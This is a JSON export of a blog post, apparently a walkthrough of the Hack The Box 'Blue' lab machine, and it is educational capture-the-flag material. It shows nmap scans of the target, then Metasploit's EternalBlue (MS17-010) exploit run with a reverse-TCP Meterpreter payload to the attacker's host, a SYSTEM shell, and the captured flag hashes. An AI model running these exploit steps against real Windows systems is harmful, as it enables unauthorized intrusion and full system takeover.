{"id":3725,"date":"2020-08-11T23:17:48","date_gmt":"2020-08-11T14:17:48","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3725"},"modified":"2020-08-30T23:34:15","modified_gmt":"2020-08-30T14:34:15","slug":"hack-the-box-blue-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3725","title":{"rendered":"Hack The Box &#8211; Blue &#8211; Walkthrough"},"content":{"rendered":"<h3>SMB is exposed<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap -A -n -F -T5 blue.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-11 11:42 UTC\r\nNmap scan report for blue.htb (10.10.10.40)\r\nHost is up (0.049s latency).\r\nNot shown: 91 filtered ports\r\nPORT      STATE SERVICE      VERSION\r\n135\/tcp   open  msrpc        Microsoft Windows RPC\r\n139\/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn\r\n445\/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)\r\n49152\/tcp open  msrpc        Microsoft Windows RPC\r\n49153\/tcp open  msrpc        Microsoft Windows RPC\r\n49154\/tcp open  msrpc        Microsoft Windows RPC\r\n49155\/tcp open  msrpc        Microsoft Windows RPC\r\n49156\/tcp open  msrpc        Microsoft Windows RPC\r\n49157\/tcp open  msrpc        Microsoft Windows RPC\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nDevice type: print server|printer|general purpose\r\nRunning (JUST GUESSING): HP embedded (89%), FreeBSD 8.X|6.X|7.X (88%), Apple Mac OS X 10.6.X|10.7.X (88%), IBM AIX 4.X (85%)\r\nOS CPE: cpe:\/h:hp:jetdirect_170x cpe:\/h:hp:inkjet_3000 cpe:\/o:freebsd:freebsd:8.0 cpe:\/o:apple:mac_os_x:10.6.2 cpe:\/o:apple:mac_os_x:10.7.4 cpe:\/o:freebsd:freebsd:6.2 cpe:\/o:freebsd:freebsd:7.0 cpe:\/o:ibm:aix:4.3\r\nAggressive OS guesses: HP 170X print server or Inkjet 3000 printer (89%), FreeBSD 8.0-CURRENT (88%), Apple Mac OS X 10.6.2 (Snow Leopard) 
(Darwin 10.2.0) (88%), Apple Mac OS X 10.7.4 (Lion) (Darwin 11.4.0) (87%), FreeBSD 6.2-RELEASE-p2 (pf with scrub enabled) (86%), HP LaserJet 4250 printer (86%), FreeBSD 7.0-RELEASE (85%), IBM AIX 4.3 (85%)\r\nNo exact OS matches for host (test conditions non-ideal).\r\nNetwork Distance: 2 hops\r\nService Info: Host: HARIS-PC; OS: Windows; CPE: cpe:\/o:microsoft:windows\r\n\r\nHost script results:\r\n|_clock-skew: mean: -14m30s, deviation: 34m37s, median: 5m27s\r\n| smb-os-discovery:\r\n|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)\r\n|   OS CPE: cpe:\/o:microsoft:windows_7::sp1:professional\r\n|   Computer name: haris-PC\r\n|   NetBIOS computer name: HARIS-PC\\x00\r\n|   Workgroup: WORKGROUP\\x00\r\n|_  System time: 2020-08-11T12:49:11+01:00\r\n| smb-security-mode:\r\n|   account_used: guest\r\n|   authentication_level: user\r\n|   challenge_response: supported\r\n|_  message_signing: disabled (dangerous, but default)\r\n| smb2-security-mode:\r\n|   2.02:\r\n|_    Message signing enabled but not required\r\n| smb2-time:\r\n|   date: 2020-08-11T11:49:10\r\n|_  start_date: 2020-08-10T16:25:02\r\n<\/pre>\n<h3>Looking for SMB vulnerabilities<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap --script vuln -p 445 10.10.10.40\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-11 13:58 UTC\r\nNmap scan report for 10.10.10.40\r\nHost is up (0.028s latency).\r\n\r\nPORT    STATE SERVICE\r\n445\/tcp open  microsoft-ds\r\n|_clamav-exec: ERROR: Script execution failed (use -d to debug)\r\n\r\nHost script results:\r\n|_smb-vuln-ms10-054: false\r\n|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND\r\n| smb-vuln-ms17-010:\r\n|   VULNERABLE:\r\n|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\r\n|     State: VULNERABLE\r\n|     IDs:  CVE:CVE-2017-0143\r\n|     Risk factor: HIGH\r\n|       A critical remote code execution vulnerability exists in Microsoft SMBv1\r\n|       
 servers (ms17-010).\r\n|\r\n|     Disclosure date: 2017-03-14\r\n|     References:\r\n|       https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-0143\r\n|       https:\/\/blogs.technet.microsoft.com\/msrc\/2017\/05\/12\/customer-guidance-for-wannacrypt-attacks\/\r\n|_      https:\/\/technet.microsoft.com\/en-us\/library\/security\/ms17-010.aspx\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 40.22 seconds\r\n<\/pre>\n<h3>Attack starting from ms17-010<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# msfconsole\r\n\r\nmsf5 &gt; search ms17-010\r\n\r\nMatching Modules\r\n================\r\n\r\n   #  Name                                           Disclosure Date  Rank     Check  Description\r\n   -  ----                                           ---------------  ----     -----  -----------\r\n   0  auxiliary\/admin\/smb\/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance\/EternalSynergy\/EternalChampion SMB Remote Windows Command Execution\r\n   1  auxiliary\/scanner\/smb\/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection\r\n   2  exploit\/windows\/smb\/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\r\n   3  exploit\/windows\/smb\/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+\r\n   4  exploit\/windows\/smb\/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance\/EternalSynergy\/EternalChampion SMB Remote Windows Code Execution\r\n   5  exploit\/windows\/smb\/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution\r\n\r\n\r\nInteract with a module by name or index, for example use 5 or use exploit\/windows\/smb\/smb_doublepulsar_rce\r\n\r\nmsf5 exploit(windows\/smb\/smb_doublepulsar_rce) &gt; use 
2\r\n&#x5B;*] No payload configured, defaulting to windows\/x64\/meterpreter\/reverse_tcp\r\n\r\nmsf5 exploit(windows\/smb\/ms17_010_eternalblue) &gt; set RHOSTS blue.htb\r\nRHOSTS =&gt; blue.htb\r\nmsf5 exploit(windows\/smb\/ms17_010_eternalblue) &gt; set LHOST 10.10.14.13\r\nLHOST =&gt; 10.10.14.13\r\nmsf5 exploit(windows\/smb\/ms17_010_eternalblue) &gt; exploit\r\n\r\n&#x5B;-] Handler failed to bind to 10.10.14.13:4444:-  -\r\n&#x5B;*] Started reverse TCP handler on 0.0.0.0:4444\r\n&#x5B;*] 10.10.10.40:445 - Using auxiliary\/scanner\/smb\/smb_ms17_010 as check\r\n&#x5B;+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)\r\n&#x5B;*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)\r\n&#x5B;*] 10.10.10.40:445 - Connecting to target for exploitation.\r\n&#x5B;+] 10.10.10.40:445 - Connection established for exploitation.\r\n&#x5B;+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply\r\n&#x5B;*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)\r\n&#x5B;*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes\r\n&#x5B;*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv\r\n&#x5B;*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1\r\n&#x5B;+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE\/RPC reply\r\n&#x5B;*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.\r\n&#x5B;*] 10.10.10.40:445 - Sending all but last fragment of exploit packet\r\n&#x5B;*] 10.10.10.40:445 - Starting non-paged pool grooming\r\n&#x5B;+] 10.10.10.40:445 - Sending SMBv2 buffers\r\n&#x5B;+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\r\n&#x5B;*] 10.10.10.40:445 - Sending final SMBv2 buffers.\r\n&#x5B;*] 10.10.10.40:445 - Sending last fragment of exploit packet!\r\n&#x5B;*] 10.10.10.40:445 - 
Receiving response from exploit packet\r\n&#x5B;+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!\r\n&#x5B;*] 10.10.10.40:445 - Sending egg to corrupted connection.\r\n&#x5B;*] 10.10.10.40:445 - Triggering free of corrupted buffer.\r\n&#x5B;*] Sending stage (201283 bytes) to 172.17.0.1\r\n&#x5B;*] Meterpreter session 1 opened (172.17.0.2:4444 -&gt; 172.17.0.1:36008) at 2020-08-11 14:10:01 +0000\r\n&#x5B;+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n&#x5B;+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n&#x5B;+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\nmeterpreter &gt; getuid\r\nServer username: NT AUTHORITY\\SYSTEM\r\nmeterpreter &gt; shell\r\nProcess 2780 created.\r\nChannel 1 created.\r\nMicrosoft Windows &#x5B;Version 6.1.7601]\r\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\r\n\r\nC:\\Windows\\system32&gt;cd C:\\Users\r\ncd C:\\Users\r\n\r\nC:\\Users&gt;type haris\\Desktop\\user.txt\r\ntype haris\\Desktop\\user.txt\r\n4c546aea7dbee75cbd71de245c8deea9\r\nC:\\Users&gt;type administrator\\Desktop\\root.txt\r\ntype administrator\\Desktop\\root.txt\r\nff548eb71e920ff6c08843ce9df4e717\r\n\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>SMB is exposed # nmap -A -n -F -T5 blue.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-11 11:42 UTC Nmap  
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3725"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3725"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3725\/revisions"}],"predecessor-version":[{"id":3787,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3725\/revisions\/3787"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3725"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3725"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3725"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}